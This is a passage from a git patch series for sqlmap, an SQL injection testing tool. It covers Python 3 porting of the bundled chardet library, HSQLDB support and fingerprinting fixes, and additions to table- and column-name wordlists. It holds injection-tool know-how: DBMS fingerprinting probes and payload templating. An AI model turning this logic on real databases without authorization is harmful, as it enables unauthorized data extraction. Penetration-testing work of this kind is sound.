if self._mTotalSeqs > 0: -# print self._mSeqCounters[POSITIVE_CAT], self._mTotalSeqs, self._mModel['mTypicalPositiveRatio'] - r = (1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs / self._mModel['mTypicalPositiveRatio'] -# print r, self._mFreqChar, self._mTotalChar + r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs + / self._mModel['mTypicalPositiveRatio']) r = r * self._mFreqChar / self._mTotalChar if r >= 1.0: r = 0.99 diff --git a/thirdparty/chardet/sbcsgroupprober.py b/thirdparty/chardet/sbcsgroupprober.py index d19160c86..1b6196cd1 100644 --- a/thirdparty/chardet/sbcsgroupprober.py +++ b/thirdparty/chardet/sbcsgroupprober.py @@ -14,33 +14,35 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from charsetgroupprober import CharSetGroupProber -from sbcharsetprober import SingleByteCharSetProber -from langcyrillicmodel import Win1251CyrillicModel, Koi8rModel, Latin5CyrillicModel, MacCyrillicModel, Ibm866Model, Ibm855Model -from langgreekmodel import Latin7GreekModel, Win1253GreekModel -from langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel -from langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel -from langthaimodel import TIS620ThaiModel -from langhebrewmodel import Win1255HebrewModel -from hebrewprober import HebrewProber +from .charsetgroupprober import CharSetGroupProber +from .sbcharsetprober import SingleByteCharSetProber +from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel, + Latin5CyrillicModel, MacCyrillicModel, + Ibm866Model, Ibm855Model) +from .langgreekmodel import Latin7GreekModel, Win1253GreekModel +from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel +from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel +from .langthaimodel import TIS620ThaiModel +from .langhebrewmodel import Win1255HebrewModel +from .hebrewprober import HebrewProber + class SBCSGroupProber(CharSetGroupProber): def __init__(self): CharSetGroupProber.__init__(self) - self._mProbers = [ \ + self._mProbers = [ SingleByteCharSetProber(Win1251CyrillicModel), SingleByteCharSetProber(Koi8rModel), SingleByteCharSetProber(Latin5CyrillicModel), @@ -54,11 +56,14 @@ class SBCSGroupProber(CharSetGroupProber): SingleByteCharSetProber(Latin2HungarianModel), SingleByteCharSetProber(Win1250HungarianModel), SingleByteCharSetProber(TIS620ThaiModel), - ] + ] hebrewProber = HebrewProber() - logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.False, hebrewProber) - visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.True, hebrewProber) + logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, + False, hebrewProber) + visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True, + hebrewProber) hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber) - self._mProbers.extend([hebrewProber, logicalHebrewProber, visualHebrewProber]) + self._mProbers.extend([hebrewProber, logicalHebrewProber, + visualHebrewProber]) self.reset() diff --git a/thirdparty/chardet/sjisprober.py b/thirdparty/chardet/sjisprober.py index 8f69f60be..cd0e9e707 100644 --- a/thirdparty/chardet/sjisprober.py +++ b/thirdparty/chardet/sjisprober.py @@ -13,25 +13,26 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import SJISDistributionAnalysis -from jpcntx import SJISContextAnalysis -from mbcssm import SJISSMModel -import constants, sys -from constants import eStart, eError, eItsMe +import sys +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import SJISDistributionAnalysis +from .jpcntx import SJISContextAnalysis +from .mbcssm import SJISSMModel +from . import constants + class SJISProber(MultiByteCharSetProber): def __init__(self): @@ -46,35 +47,40 @@ class SJISProber(MultiByteCharSetProber): self._mContextAnalyzer.reset() def get_charset_name(self): - return "SHIFT_JIS" + return self._mContextAnalyzer.get_charset_name() def feed(self, aBuf): aLen = len(aBuf) - for i in xrange(0, aLen): + for i in range(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: + if codingState == constants.eError: if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') + sys.stderr.write(self.get_charset_name() + + ' prober hit error at byte ' + str(i) + + '\n') self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: charLen = self._mCodingSM.get_current_charlen() if i == 0: self._mLastChar[1] = aBuf[0] - self._mContextAnalyzer.feed(self._mLastChar[2 - charLen :], charLen) + self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:], + charLen) self._mDistributionAnalyzer.feed(self._mLastChar, charLen) else: - self._mContextAnalyzer.feed(aBuf[i + 1 - charLen : i + 3 - charLen], charLen) - self._mDistributionAnalyzer.feed(aBuf[i - 1 : i + 1], charLen) + self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3 + - charLen], charLen) + self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1], + charLen) self._mLastChar[0] = aBuf[aLen - 1] if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): + if (self._mContextAnalyzer.got_enough_data() and + (self.get_confidence() > constants.SHORTCUT_THRESHOLD)): self._mState = constants.eFoundIt return self.get_state() diff --git a/thirdparty/chardet/test.py b/thirdparty/chardet/test.py deleted file mode 100644 index 2ebf3a4dc..000000000 --- a/thirdparty/chardet/test.py +++ /dev/null @@ -1,20 +0,0 @@ -import sys, glob -sys.path.insert(0, '..') -from chardet.universaldetector import UniversalDetector - -count = 0 -u = UniversalDetector() -for f in glob.glob(sys.argv[1]): - print f.ljust(60), - u.reset() - for line in file(f, 'rb'): - u.feed(line) - if u.done: break - u.close() - result = u.result - if result['encoding']: - print result['encoding'], 'with confidence', result['confidence'] - else: - print '******** no result' - count += 1 -print count, 'tests' diff --git a/thirdparty/chardet/universaldetector.py b/thirdparty/chardet/universaldetector.py index a08425f87..476522b99 100644 --- a/thirdparty/chardet/universaldetector.py +++ b/thirdparty/chardet/universaldetector.py @@ -14,23 +14,25 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from latin1prober import Latin1Prober # windows-1252 -from mbcsgroupprober import MBCSGroupProber # multi-byte character sets -from sbcsgroupprober import SBCSGroupProber # single-byte character sets -from escprober import EscCharSetProber # ISO-2122, etc. +from . import constants +import sys +import codecs +from .latin1prober import Latin1Prober # windows-1252 +from .mbcsgroupprober import MBCSGroupProber # multi-byte character sets +from .sbcsgroupprober import SBCSGroupProber # single-byte character sets +from .escprober import EscCharSetProber # ISO-2122, etc. import re MINIMUM_THRESHOLD = 0.20 @@ -38,68 +40,78 @@ ePureAscii = 0 eEscAscii = 1 eHighbyte = 2 + class UniversalDetector: def __init__(self): - self._highBitDetector = re.compile(r'[\x80-\xFF]') - self._escDetector = re.compile(r'(\033|~{)') + self._highBitDetector = re.compile(b'[\x80-\xFF]') + self._escDetector = re.compile(b'(\033|~{)') self._mEscCharSetProber = None self._mCharSetProbers = [] self.reset() def reset(self): self.result = {'encoding': None, 'confidence': 0.0} - self.done = constants.False - self._mStart = constants.True - self._mGotData = constants.False + self.done = False + self._mStart = True + self._mGotData = False self._mInputState = ePureAscii - self._mLastChar = '' + self._mLastChar = b'' if self._mEscCharSetProber: self._mEscCharSetProber.reset() for prober in self._mCharSetProbers: prober.reset() def feed(self, aBuf): - if self.done: return + if self.done: + return aLen = len(aBuf) - if not aLen: return + if not aLen: + return if not self._mGotData: # If the data starts with BOM, we know it is UTF - if aBuf[:3] == '\xEF\xBB\xBF': + if aBuf[:3] == codecs.BOM_UTF8: # EF BB BF UTF-8 with BOM - self.result = {'encoding': "UTF-8", 'confidence': 1.0} - elif aBuf[:4] == '\xFF\xFE\x00\x00': + self.result = {'encoding': "UTF-8-SIG", 'confidence': 1.0} + elif aBuf[:4] == codecs.BOM_UTF32_LE: # FF FE 00 00 UTF-32, little-endian BOM self.result = {'encoding': "UTF-32LE", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFE\xFF': + elif aBuf[:4] == codecs.BOM_UTF32_BE: # 00 00 FE FF UTF-32, big-endian BOM self.result = {'encoding': "UTF-32BE", 'confidence': 1.0} - elif aBuf[:4] == '\xFE\xFF\x00\x00': + elif aBuf[:4] == b'\xFE\xFF\x00\x00': # FE FF 00 00 UCS-4, unusual octet order BOM (3412) - self.result = {'encoding': "X-ISO-10646-UCS-4-3412", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFF\xFE': + self.result = { + 'encoding': "X-ISO-10646-UCS-4-3412", + 'confidence': 1.0 + } + elif aBuf[:4] == b'\x00\x00\xFF\xFE': # 00 00 FF FE UCS-4, unusual octet order BOM (2143) - self.result = {'encoding': "X-ISO-10646-UCS-4-2143", 'confidence': 1.0} - elif aBuf[:2] == '\xFF\xFE': + self.result = { + 'encoding': "X-ISO-10646-UCS-4-2143", + 'confidence': 1.0 + } + elif aBuf[:2] == codecs.BOM_LE: # FF FE UTF-16, little endian BOM self.result = {'encoding': "UTF-16LE", 'confidence': 1.0} - elif aBuf[:2] == '\xFE\xFF': + elif aBuf[:2] == codecs.BOM_BE: # FE FF UTF-16, big endian BOM self.result = {'encoding': "UTF-16BE", 'confidence': 1.0} - self._mGotData = constants.True + self._mGotData = True if self.result['encoding'] and (self.result['confidence'] > 0.0): - self.done = constants.True + self.done = True return if self._mInputState == ePureAscii: if self._highBitDetector.search(aBuf): self._mInputState = eHighbyte - elif (self._mInputState == ePureAscii) and self._escDetector.search(self._mLastChar + aBuf): + elif ((self._mInputState == ePureAscii) and + self._escDetector.search(self._mLastChar + aBuf)): self._mInputState = eEscAscii - self._mLastChar = aBuf[-1] + self._mLastChar = aBuf[-1:] if self._mInputState == eEscAscii: if not self._mEscCharSetProber: @@ -107,24 +119,26 @@ class UniversalDetector: if self._mEscCharSetProber.feed(aBuf) == constants.eFoundIt: self.result = {'encoding': self._mEscCharSetProber.get_charset_name(), 'confidence': self._mEscCharSetProber.get_confidence()} - self.done = constants.True + self.done = True elif self._mInputState == eHighbyte: if not self._mCharSetProbers: - self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), Latin1Prober()] + self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), + Latin1Prober()] for prober in self._mCharSetProbers: if prober.feed(aBuf) == constants.eFoundIt: self.result = {'encoding': prober.get_charset_name(), 'confidence': prober.get_confidence()} - self.done = constants.True + self.done = True break def close(self): - if self.done: return + if self.done: + return if not self._mGotData: if constants._debug: sys.stderr.write('no data received!\n') return - self.done = constants.True + self.done = True if self._mInputState == ePureAscii: self.result = {'encoding': 'ascii', 'confidence': 1.0} @@ -135,7 +149,8 @@ class UniversalDetector: maxProberConfidence = 0.0 maxProber = None for prober in self._mCharSetProbers: - if not prober: continue + if not prober: + continue proberConfidence = prober.get_confidence() if proberConfidence > maxProberConfidence: maxProberConfidence = proberConfidence @@ -148,7 +163,8 @@ class UniversalDetector: if constants._debug: sys.stderr.write('no probers hit minimum threshhold\n') for prober in self._mCharSetProbers[0].mProbers: - if not prober: continue - sys.stderr.write('%s confidence = %s\n' % \ - (prober.get_charset_name(), \ + if not prober: + continue + sys.stderr.write('%s confidence = %s\n' % + (prober.get_charset_name(), prober.get_confidence())) diff --git a/thirdparty/chardet/utf8prober.py b/thirdparty/chardet/utf8prober.py index fec8548c8..1c0bb5d8f 100644 --- a/thirdparty/chardet/utf8prober.py +++ b/thirdparty/chardet/utf8prober.py @@ -13,26 +13,26 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from constants import eStart, eError, eItsMe -from charsetprober import CharSetProber -from codingstatemachine import CodingStateMachine -from mbcssm import UTF8SMModel +from . import constants +from .charsetprober import CharSetProber +from .codingstatemachine import CodingStateMachine +from .mbcssm import UTF8SMModel ONE_CHAR_PROB = 0.5 + class UTF8Prober(CharSetProber): def __init__(self): CharSetProber.__init__(self) @@ -50,13 +50,13 @@ class UTF8Prober(CharSetProber): def feed(self, aBuf): for c in aBuf: codingState = self._mCodingSM.next_state(c) - if codingState == eError: + if codingState == constants.eError: self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: if self._mCodingSM.get_current_charlen() >= 2: self._mNumOfMBChar += 1 @@ -69,7 +69,7 @@ class UTF8Prober(CharSetProber): def get_confidence(self): unlike = 0.99 if self._mNumOfMBChar < 6: - for i in xrange(0, self._mNumOfMBChar): + for i in range(0, self._mNumOfMBChar): unlike = unlike * ONE_CHAR_PROB return 1.0 - unlike else: From 41db0e0eea3125c6db4b467390803006e0f5f6a0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 13:48:21 +0200 Subject: [PATCH 73/92] range to xrange (leftovers) --- lib/takeover/udf.py | 4 ++-- thirdparty/chardet/eucjpprober.py | 2 +- thirdparty/chardet/mbcharsetprober.py | 2 +- thirdparty/chardet/sjisprober.py | 2 +- thirdparty/chardet/utf8prober.py | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index aa10b3c63..d5f951383 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -258,7 +258,7 @@ class UDF: else: logger.warn("invalid value, only digits are allowed") - for x in range(0, udfCount): + for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) @@ -293,7 +293,7 @@ class UDF: else: logger.warn("invalid value, only digits >= 0 are allowed") - for y in range(0, parCount): + for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) diff --git a/thirdparty/chardet/eucjpprober.py b/thirdparty/chardet/eucjpprober.py index 8e64fdcc2..2d5b2701c 100644 --- a/thirdparty/chardet/eucjpprober.py +++ b/thirdparty/chardet/eucjpprober.py @@ -51,7 +51,7 @@ class EUCJPProber(MultiByteCharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in range(0, aLen): + for i in xrange(0, aLen): # PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte codingState = self._mCodingSM.next_state(aBuf[i]) if codingState == constants.eError: diff --git a/thirdparty/chardet/mbcharsetprober.py b/thirdparty/chardet/mbcharsetprober.py index bb42f2fb5..c98cc6228 100644 --- a/thirdparty/chardet/mbcharsetprober.py +++ b/thirdparty/chardet/mbcharsetprober.py @@ -52,7 +52,7 @@ class MultiByteCharSetProber(CharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in range(0, aLen): + for i in xrange(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) if codingState == constants.eError: if constants._debug: diff --git a/thirdparty/chardet/sjisprober.py b/thirdparty/chardet/sjisprober.py index cd0e9e707..4edb6df9b 100644 --- a/thirdparty/chardet/sjisprober.py +++ b/thirdparty/chardet/sjisprober.py @@ -51,7 +51,7 @@ class SJISProber(MultiByteCharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in range(0, aLen): + for i in xrange(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) if codingState == constants.eError: if constants._debug: diff --git a/thirdparty/chardet/utf8prober.py b/thirdparty/chardet/utf8prober.py index 1c0bb5d8f..42d32ec3a 100644 --- a/thirdparty/chardet/utf8prober.py +++ b/thirdparty/chardet/utf8prober.py @@ -69,7 +69,7 @@ class UTF8Prober(CharSetProber): def get_confidence(self): unlike = 0.99 if self._mNumOfMBChar < 6: - for i in range(0, self._mNumOfMBChar): + for i in xrange(0, self._mNumOfMBChar): unlike = unlike * ONE_CHAR_PROB return 1.0 - unlike else: From fa4e86703566746849920097ab2239bea1b0e887 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 14:17:13 +0200 Subject: [PATCH 74/92] Bug fix for MySQL fingerprinting (excluding HSQLDB MySQL look-alike) --- plugins/dbms/mysql/fingerprint.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 700badb4f..a4e440df7 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -177,6 +177,14 @@ class Fingerprint(GenericFingerprint): return False + result = inject.checkBooleanExpression("ROUNDMAGIC(NULL) IS NULL") + + if result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL + logger.warn(warnMsg) + + return False + # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 From 9641e84dd95c414edcf0640e7fd0616bb90b2ad4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 16:52:13 +0200 Subject: [PATCH 75/92] Bug fixes for HSQLDB --- lib/core/agent.py | 11 +++++++++-- lib/core/dump.py | 2 +- lib/core/settings.py | 2 ++ plugins/dbms/hsqldb/enumeration.py | 4 ++++ plugins/generic/databases.py | 2 +- plugins/generic/entries.py | 2 +- txt/common-columns.txt | 4 ++++ txt/common-tables.txt | 3 +++ xml/queries.xml | 14 +++++++------- 9 files changed, 32 insertions(+), 12 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index f44c369cb..c6827461d 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -480,7 +480,7 @@ class Agent(object): @rtype: C{str} """ - prefixRegex = r"(?:\s+(?:FIRST|SKIP)\s+\d+)*" + prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*" fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) @@ -508,7 +508,10 @@ class Agent(object): elif fieldsSelectRownum: fieldsToCastStr = fieldsSelectRownum.groups()[0] elif fieldsSelectDistinct: - fieldsToCastStr = fieldsSelectDistinct.groups()[0] + if Backend.getDbms() in (DBMS.HSQLDB,): + fieldsToCastStr = fieldsNoSelect + else: + fieldsToCastStr = fieldsSelectDistinct.groups()[0] elif fieldsSelectCase: fieldsToCastStr = fieldsSelectCase.groups()[0] elif fieldsSelectFrom: @@ -888,6 +891,10 @@ class Agent(object): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr + elif Backend.isDbms(DBMS.HSQLDB): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) + limitedQuery += " %s" % limitStr + elif Backend.isDbms(DBMS.FIREBIRD): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1) limitedQuery += " %s" % limitStr diff --git a/lib/core/dump.py b/lib/core/dump.py index 03caf233b..058f5d9e9 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -160,7 +160,7 @@ class Dump(object): def currentDb(self, data): if Backend.isDbms(DBMS.MAXDB): self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3256c0fa1..3b53705ba 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -222,6 +222,8 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) +HSQLDB_DEFAULT_SCHEMA = "PUBLIC" + # Names that can't be used to name files on Windows OS WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py index 9bf2b9b23..67744d4b5 100644 --- a/plugins/dbms/hsqldb/enumeration.py +++ b/plugins/dbms/hsqldb/enumeration.py @@ -12,6 +12,7 @@ from lib.core.data import logger from lib.core.data import queries from lib.core.common import Backend from lib.core.common import unArrayizeValue +from lib.core.settings import HSQLDB_DEFAULT_SCHEMA from lib.request import inject class Enumeration(GenericEnumeration): @@ -40,3 +41,6 @@ class Enumeration(GenericEnumeration): def getHostname(self): warnMsg = "on HSQLDB it is not possible to enumerate the hostname" logger.warn(warnMsg) + + def getCurrentDb(self): + return HSQLDB_DEFAULT_SCHEMA diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index b9eed29b9..ed3ac32eb 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -674,7 +674,7 @@ class Databases: continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 6dc5fe8c4..ec1dc8640 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -296,7 +296,7 @@ class Entries: if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), diff --git a/txt/common-columns.txt b/txt/common-columns.txt index 3464db5fc..6eab10cab 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -2596,3 +2596,7 @@ tmp_lahir universitas urut waktu + +# WebGoat +cookie +login_count diff --git a/txt/common-tables.txt b/txt/common-tables.txt index 9468c9382..e9a488a2d 100644 --- a/txt/common-tables.txt +++ b/txt/common-tables.txt @@ -3366,3 +3366,6 @@ tuser tusers userstbl usertbl + +# WebGoat +user_data diff --git a/xml/queries.xml b/xml/queries.xml index 75185bca0..c57a5b49f 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -652,7 +652,7 @@ - + @@ -675,30 +675,30 @@ - + - + - + - + - + - + From 51444276c0e9572ec5a19a11949dceb34426754a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 14:19:47 +0200 Subject: [PATCH 76/92] Better dealing with MySQL vs HSQLDB --- plugins/dbms/mysql/fingerprint.py | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index a4e440df7..dbeedfa29 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -169,7 +169,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "confirming %s" % DBMS.MYSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("USER() LIKE USER()") + result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL @@ -177,14 +177,6 @@ class Fingerprint(GenericFingerprint): return False - result = inject.checkBooleanExpression("ROUNDMAGIC(NULL) IS NULL") - - if result: - warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) - - return False - # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 From 17ee40259273715d6520e2bd91640dbd5fdd9c26 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 14:53:08 +0200 Subject: [PATCH 77/92] Adding error regexes for HSQLDB --- xml/errors.xml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/xml/errors.xml b/xml/errors.xml index ebb7ddd0a..d8ba7fc72 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -104,6 +104,8 @@ + + From 786b51e6e4f7282faf96e014efa44f25ec02ee1f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 15:18:47 +0200 Subject: [PATCH 78/92] Minor patch --- xml/errors.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xml/errors.xml b/xml/errors.xml index d8ba7fc72..1ea13fbdc 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -105,7 +105,7 @@ - + From ecef7692000f40fc8d4e5231ae663fe1c7136798 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 15:23:09 +0200 Subject: [PATCH 79/92] More generic approach (non-: versions appear too) --- xml/errors.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xml/errors.xml b/xml/errors.xml index 1ea13fbdc..eb4670fd9 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -105,7 +105,7 @@ - + From 47a42c234e890d468814529c0ebbac6163b3b84f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 19:19:50 +0200 Subject: [PATCH 80/92] Fixes #1459 --- lib/core/agent.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index c6827461d..e2963f01b 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -308,8 +308,8 @@ class Agent(object): for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, randomStr()) - if origValue is not None: - payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if origValue is not None and "[ORIGVALUE]" in payload: + payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) if "[INFERENCE]" in payload: if Backend.getIdentifiedDbms() is not None: From b9a44555fffe6b53bf5f61c387e9739ed65175eb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Oct 2015 15:20:10 +0200 Subject: [PATCH 81/92] Fixes #1462 --- lib/request/inject.py | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/request/inject.py b/lib/request/inject.py index 13b8984d4..ecbf65384 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -39,6 +39,7 @@ from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import MAX_TECHNIQUES_PER_VALUE @@ -262,9 +263,14 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) + try: + for num in 